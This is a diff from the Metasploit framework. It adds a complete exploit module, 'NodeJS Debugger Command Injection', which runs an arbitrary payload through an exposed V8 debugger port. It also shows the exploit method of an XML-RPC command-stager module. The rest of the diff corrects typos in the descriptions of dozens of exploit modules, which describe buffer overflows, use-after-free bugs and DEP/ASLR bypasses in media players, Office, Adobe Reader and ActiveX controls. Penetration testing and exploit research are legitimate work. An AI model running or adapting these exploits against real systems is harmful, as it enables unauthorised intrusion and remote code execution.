print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
|
||||
params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
|
||||
end
|
||||
return send_request_cgi(params, timeout=5)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
res = execute_cmdstager(:linemax => 800)
|
||||
|
||||
if res
|
||||
if res.code == 401
|
||||
fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
|
||||
elsif res.code == 404
|
||||
fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
|
||||
end
|
||||
else
|
||||
print_good('Request returned without status code, usually indicates success. Passing to handler..')
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,90 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "NodeJS Debugger Command Injection",
|
||||
'Description' => %q{
|
||||
This module uses the "evaluate" request type of the NodeJS V8
|
||||
debugger protocol (version 1) to evaluate arbitrary JS and
|
||||
call out to other system commands. The port (default 5858) is
|
||||
not exposed non-locally in default configurations, but may be
|
||||
exposed either intentionally or via misconfiguration.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
|
||||
[ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Aug 15 2016",
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5858)
|
||||
])
|
||||
end
|
||||
|
||||
def make_eval_message
|
||||
msg_body = { seq: 1,
|
||||
type: 'request',
|
||||
command: 'evaluate',
|
||||
arguments: { expression: payload.encoded,
|
||||
global: true,
|
||||
maxStringLength:-1
|
||||
}
|
||||
}.to_json
|
||||
msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
|
||||
msg_header + msg_body
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
res = sock.get_once
|
||||
disconnect
|
||||
|
||||
if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
|
||||
vprint_status("Got debugger handshake:\n#{res}")
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
# must consume incoming handshake before sending payload
|
||||
buf = sock.get_once
|
||||
msg = make_eval_message
|
||||
print_status("Sending #{msg.length} byte payload...")
|
||||
vprint_status("#{msg}")
|
||||
sock.put(msg)
|
||||
buf = sock.get_once
|
||||
|
||||
if buf.include? '"command":"evaluate","success":true'
|
||||
print_status("Got success response")
|
||||
elsif buf.include? '"command":"evaluate","success":false'
|
||||
print_error("Got failure response: #{buf}")
|
||||
else
|
||||
print_error("Got unexpected response: #{buf}")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
rendering engine. It is possible to redirect the output of a XSLT
|
||||
transformation to an arbitrary file. The content of the created file must be
|
||||
ASCII or UTF-8. The destination path can be relative or absolute. This module
|
||||
has been tested on Safari and Maxthon. Code execution can be acheived by first
|
||||
has been tested on Safari and Maxthon. Code execution can be achieved by first
|
||||
uploading the payload to the remote machine in VBS format, and then upload a MOF
|
||||
file, which enables Windows Management Instrumentation service to execute the VBS.
|
||||
},
|
||||
|
|
|
@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super( update_info(info,
|
||||
'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference',
|
||||
'Description' => %q{
|
||||
This module exploits a integer overflow in TeeChart Pro ActiveX control. When
|
||||
This module exploits an integer overflow in TeeChart Pro ActiveX control. When
|
||||
sending an overly large/negative integer value to the AddSeries() property of
|
||||
TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the
|
||||
TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the
|
||||
value and is later directly trusted and called upon.
|
||||
|
||||
This module has been designed to bypass DEP only under IE8 with Java support. Multiple
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
|
||||
ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
|
||||
ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-
|
||||
based buffer overflow will occur when copying attacker-supplied data using the
|
||||
sprintf function.
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Winamp Playlist UNC Path Computer Name Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Winamp media player.
|
||||
This flaw is triggered when a audio file path is specified, inside a
|
||||
This flaw is triggered when an audio file path is specified, inside a
|
||||
playlist, that consists of a UNC path with a long computer name. This
|
||||
module delivers the playlist via the browser. This module has only
|
||||
been successfully tested on Winamp 5.11 and 5.12.
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack buffer overflow in Winamp 5.24. By
|
||||
sending an overly long artist tag, a remote attacker may
|
||||
be able to execute arbitrary code. This vulnerability can be
|
||||
exploited from the browser or the winamp client itself.
|
||||
exploited from the browser or the Winamp client itself.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX
|
||||
control in InterVideo WinDVD 7. By sending a overly long string
|
||||
control in InterVideo WinDVD 7. By sending an overly long string
|
||||
to the "ApplicationType()" property, an attacker may be able to
|
||||
execute arbitrary code.
|
||||
},
|
||||
|
|
|
@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
opt-in to ASLR. As such, this module should be reliable on all Windows
|
||||
versions.
|
||||
|
||||
The WMI Adminsitrative Tools are a standalone download & install (linked in the
|
||||
The WMI Administrative Tools are a standalone download & install (linked in the
|
||||
references).
|
||||
|
||||
},
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
|
||||
X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
|
||||
X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun
|
||||
a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX
|
||||
Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string
|
||||
Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string
|
||||
to the "fvCom()" method from a yahoo.com domain, an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX
|
||||
Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.
|
||||
By sending a overly long string to the "Server()" method, and then calling
|
||||
By sending an overly long string to the "Server()" method, and then calling
|
||||
the "Send()" method, an attacker may be able to execute arbitrary code.
|
||||
Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp"
|
||||
yield for the best results.
|
||||
|
|
|
@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
streams with certain MAPI attachment properties, it is possible to set a path name
|
||||
to files to be executed. When a user double clicks on such an attachment or message,
|
||||
Outlook will proceed to execute the file that is set by the path name value. These
|
||||
files can be local files, but also file stored remotely for example on a file share.
|
||||
Exploitation is limited by the fact that its is not possible for attackers to supply
|
||||
command line options.
|
||||
files can be local files, but also files stored remotely (on a file share, for example)
|
||||
can be used. Exploitation is limited by the fact that it is not possible for attackers
|
||||
to supply command line options.
|
||||
},
|
||||
'Author' => 'Yorick Koster <yorick[at]akitasecurity.nl>',
|
||||
'References' =>
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
|
||||
occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges
|
||||
of the user running the application . This module has been tested successfully on
|
||||
of the user running the application. This module has been tested successfully on
|
||||
ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
NOTE: This module uses a similar DEP bypass method to that used within the
|
||||
adobe_libtiff module. This method is unlikely to work across various
|
||||
Windows versions due a the hardcoded syscall number.
|
||||
Windows versions due to a hardcoded syscall number.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Adobe Reader ToolButton Use After Free',
|
||||
'Description' => %q{
|
||||
This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
|
||||
This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6
|
||||
and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
|
||||
the cEnable callback can be used to early free the object memory. Later use of the object
|
||||
allows triggering the use after free condition. This module has been tested successfully
|
||||
|
|
|
@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Apple Quicktime. The flaw is
|
||||
triggered when Quicktime fails to properly handle the data length for certain
|
||||
This module exploits a vulnerability found in Apple QuickTime. The flaw is
|
||||
triggered when QuickTime fails to properly handle the data length for certain
|
||||
atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
|
||||
overflow by loading a specially crafted .mov file, and allows arbitrary
|
||||
code execution under the context of the current user. Please note: Since an egghunter
|
||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
|
||||
An attacker must send the file to victim and the victim must open the file.
|
||||
Alternatively it may be possible to execute code remotely via an embedded
|
||||
PLS file within a browser, when the PLS extention is registered to Audiotran.
|
||||
PLS file within a browser, when the PLS extension is registered to Audiotran.
|
||||
This functionality has not been tested in this module.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
|
||||
An attacker must send the file to victim and the victim must open the file.
|
||||
Alternatively, it may be possible to execute code remotely via an embedded
|
||||
PLS file within a browser when the PLS extention is registered to Audiotran.
|
||||
PLS file within a browser when the PLS extension is registered to Audiotran.
|
||||
This alternate vector has not been tested and cannot be exercised directly
|
||||
with this module.
|
||||
},
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Aviosoft Digital TV Player
|
||||
Pro version 1.x. An overflow occurs when the process copies the content of a
|
||||
playlist file on to the stack, which may result aribitrary code execution under
|
||||
playlist file on to the stack, which may result arbitrary code execution under
|
||||
the context of the user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit
|
|||
'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
|
||||
vulnerability exists in the parising of the UserName parameter in the NetConfig.ini
|
||||
vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini
|
||||
file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP
|
||||
SP3 and Windows 7 SP1.
|
||||
},
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'CA Antivirus Engine CAB Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.
|
||||
By creating a specially crafted CAB file, an an attacker may be able
|
||||
By creating a specially crafted CAB file, an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
|
||||
a m3u playlist with a long track name, a SEH exception record can be overwritten
|
||||
with parts of the controllable buffer. SEH execution is triggered after an
|
||||
invalid read of an injectible address, thus allowing arbitrary code execution.
|
||||
invalid read of an injectable address, thus allowing arbitrary code execution.
|
||||
This module works on multiple Windows platforms including: Windows XP SP3,
|
||||
Windows Vista, and Windows 7.
|
||||
},
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a buffer overflow vulnerability found in Chasys Draw IES
|
||||
(version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
|
||||
parsing BMP files, where the ReadFile function is used to store user provided data
|
||||
on the stack in a insecure way. It results in arbitrary code execution under the
|
||||
on the stack in an insecure way. It results in arbitrary code execution under the
|
||||
context of the user viewing a specially crafted BMP file. This module has been
|
||||
tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
|
||||
SP1.
|
||||
|
|
|
@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
|
||||
similar except an additional SpecialFolderDataBlock is included. The folder ID set
|
||||
in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
|
||||
in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
|
||||
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
|
||||
DLL file.
|
||||
},
|
||||
|
|
|
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).
|
||||
An attacker must send the file to victim and the victim must open the file.
|
||||
Alternatively it may be possible to execute code remotely via an embedded
|
||||
DBR file within a browser, since the DBR extention is registered to DeepBurner.
|
||||
DBR file within a browser, since the DBR extension is registered to DeepBurner.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
|
||||
Standard. By supplying a long string of data in a plf file (playlist), the
|
||||
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
|
||||
and then copy it on the stack without any proper bounds checking, which casues a
|
||||
buffer overflow, and results arbitrary code execution under the context of the user.
|
||||
and then copy it on the stack without any proper bounds checking, which causes a
|
||||
buffer overflow, and results in arbitrary code execution under the context of the user.
|
||||
|
||||
This module has been designed to target common Windows systems such as:
|
||||
Windows XP SP2/SP3, Windows Vista, and Windows 7.
|
||||
|
|
|
@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control
|
||||
(KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's
|
||||
This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control
|
||||
(KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's
|
||||
Documentation ApplicationXtender 5.4.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
|
||||
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
|
||||
function ERM_convert_to_correct_webpath handles user provided data in a insecure
|
||||
function ERM_convert_to_correct_webpath handles user provided data in an insecure
|
||||
way. It results in arbitrary code execution under the context of the user viewing
|
||||
a specially crafted .ers file. This module has been tested successfully with ERS
|
||||
Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
|
||||
The vulnerability exists in the module ermapper_u.dll, where the function
|
||||
rf_report_error handles user provided data in a insecure way. It results in
|
||||
rf_report_error handles user provided data in an insecure way. It results in
|
||||
arbitrary code execution under the context of the user viewing a specially crafted
|
||||
.ers file. This module has been tested successfully with ERS Viewer 2013 (versions
|
||||
13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
|
||||
By creating a specially crafted hhp file, an an attacker may be able
|
||||
By creating a specially crafted hhp file, an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module embeds an exploit into an ucompressed map file (.h3m) for
|
||||
This module embeds an exploit into an uncompressed map file (.h3m) for
|
||||
Heroes of Might and Magic III. Once the map is started in-game, a
|
||||
buffer overflow occuring when loading object sprite names leads to
|
||||
buffer overflow occurring when loading object sprite names leads to
|
||||
shellcode execution.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.
|
||||
|
||||
To ensure we can perform arbitrary code execution we must we provide a valid pointer at
|
||||
0x74 which is used as a argument for the called function at 0x675751ED as a id file
|
||||
0x74 which is used as an argument for the called function at 0x675751ED as an id file
|
||||
extension parameter. Once the caller regains control we will reach our RETURN. The Ret
|
||||
instruction will be used to pop the overwritten saved return address which was currupted.
|
||||
instruction will be used to pop the overwritten saved return address which was corrupted.
|
||||
|
||||
This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'IcoFX Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability in version 2.1
|
||||
of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
|
||||
of IcoFX. The vulnerability exists while parsing .ICO files, where a specially
|
||||
crafted ICONDIR header providing an arbitrary long number of images in the file
|
||||
can be used to trigger the overflow when reading the ICONDIRENTRY structures.
|
||||
},
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack buffer overflow in versions v9.7
|
||||
through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
|
||||
IDEAL Migration. All versions are suspected to be vulnerable.
|
||||
By creating a specially crafted ipj file, an an attacker may be able
|
||||
By creating a specially crafted ipj file, an attacker may be able
|
||||
to execute arbitrary code.
|
||||
|
||||
NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
|
||||
|
|
|
@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails
|
||||
to check the FileName argument, and passes it on to a ShellExecuteW() function,
|
||||
therefore allows any malicious attacker to execute any process that's on the
|
||||
local system. However, if the victim machine is connected to a remote share (
|
||||
or something similiar), then it's also possible to execute arbitrary code.
|
||||
local system. However, if the victim machine is connected to a remote share
|
||||
(or something similar), then it's also possible to execute arbitrary code.
|
||||
Please note that a custom template is required for the payload, because the
|
||||
default Metasploit template is detectable by McAfee -- any Windows binary, such
|
||||
as calc.exe or notepad.exe, should bypass McAfee fine.
|
||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.
|
||||
An attacker must send the file to victim and the victim must open the file.
|
||||
Alternatively it may be possible to execute code remotely via an embedded
|
||||
PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.
|
||||
PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.
|
||||
This functionality has not been tested in this module.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MJM Core Player 2011
|
||||
When opening a malicious s3m file in this applications, a stack buffer overflow can be
|
||||
When opening a malicious s3m file in this application, a stack buffer overflow can be
|
||||
triggered, resulting in arbitrary code execution.
|
||||
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
|
||||
},
|
||||
|
|
|
@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow found in the handling
|
||||
of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently
|
||||
targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer.
|
||||
targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.
|
||||
|
||||
The overflow is triggered when an unsuspecting victim opens a movie file first,
|
||||
followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also
|
||||
be done from the console with the mplayer "-sub" option.
|
||||
be done from the console with the MPlayer "-sub" option.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
|
|
|
@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
structure from the file to calculate a pointer offset without doing proper
|
||||
validation. Attacker supplied data is then used to calculate the location of an
|
||||
object, and in turn a virtual function call. This results in arbitrary code
|
||||
exection.
|
||||
execution.
|
||||
|
||||
NOTE: On some versions of Office, the user will need to dismiss a warning dialog
|
||||
prior to the payload executing.
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.
|
||||
By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker
|
||||
can get the control of the excution flow. This results aribrary code execution under
|
||||
can get the control of the execution flow. This results in arbitrary code execution under
|
||||
the context of the user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a vulnerability found in Excel of Microsoft Office 2007.
|
||||
By supplying a malformed .xlb file, an attacker can control the content (source)
|
||||
of a memcpy routine, and the number of bytes to copy, therefore causing a stack-
|
||||
based buffer overflow. This results aribrary code execution under the context of
|
||||
user the user.
|
||||
based buffer overflow. This results in arbitrary code execution under the context of
|
||||
the user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Microsoft Visual Basic VBP Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack oveflow in Microsoft Visual
|
||||
This module exploits a stack overflow in Microsoft Visual
|
||||
Basic 6.0. When a specially crafted vbp file containing a long
|
||||
reference line, an attacker may be able to execute arbitrary
|
||||
code.
|
||||
|
|
|
@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
|
||||
drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
|
||||
and stored in the EAX register. The 32-bit register will run out of storage space to
|
||||
represent the large vlaue, which ends up being 0, but it still gets pushed as a
|
||||
dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
|
||||
represent the large value, which ends up being 0, but it still gets pushed as a
|
||||
dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a
|
||||
chunk anyway with size 0, and the address of this chunk is used as the destination buffer
|
||||
of a memcpy function, where the source buffer is the EXIF data (an extended image format
|
||||
supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
|
||||
|
|
|
@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Orbit Downloader URL Unicode Conversion Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in Orbit Downloader.
|
||||
The vulnerability is due to Orbit converting an URL ascii string to unicode
|
||||
in a insecure way with MultiByteToWideChar.
|
||||
The vulnerability is due to Orbit converting a URL ascii string to unicode
|
||||
in an insecure way with MultiByteToWideChar.
|
||||
The vulnerability is exploited with a specially crafted metalink file that
|
||||
should be opened with Orbit through the "File->Add Metalink..." option.
|
||||
},
|
||||
|
|
|
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'PDF Shaper Buffer Overflow',
|
||||
'Description' => %q{
|
||||
PDF Shaper is prone to a security vulnerability when processing PDF files.
|
||||
The vulnerability appear when we use Convert PDF to Image and use a specially
|
||||
crafted PDF file. This module has been tested successfully on Win Xp, Win 7,
|
||||
The vulnerability appears when we use Convert PDF to Image and use a specially
|
||||
crafted PDF file. This module has been tested successfully on Win XP, Win 7,
|
||||
Win 8, Win 10.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
|
||||
occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
|
||||
occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\".
|
||||
This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
execution. A patch is available at visiwave.com; the fix is done by XORing the return value as
|
||||
null if no match is found, and then it is validated before use.
|
||||
|
||||
NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
|
||||
NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a
|
||||
victim user to 'double click' the malicious VWR file and execute code. This module was also built
|
||||
to bypass ASLR and DEP.
|
||||
},
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in the Win32AddConnection
|
||||
function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are
|
||||
function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are
|
||||
reportedly affected.
|
||||
|
||||
This vulnerability is only present in Win32 builds of VLC.
|
||||
|
|
|
@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'VUPlayer CUE Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack over flow in VUPlayer <= 2.49. When
|
||||
the application is used to open a specially crafted cue file, an buffer is overwritten allowing
|
||||
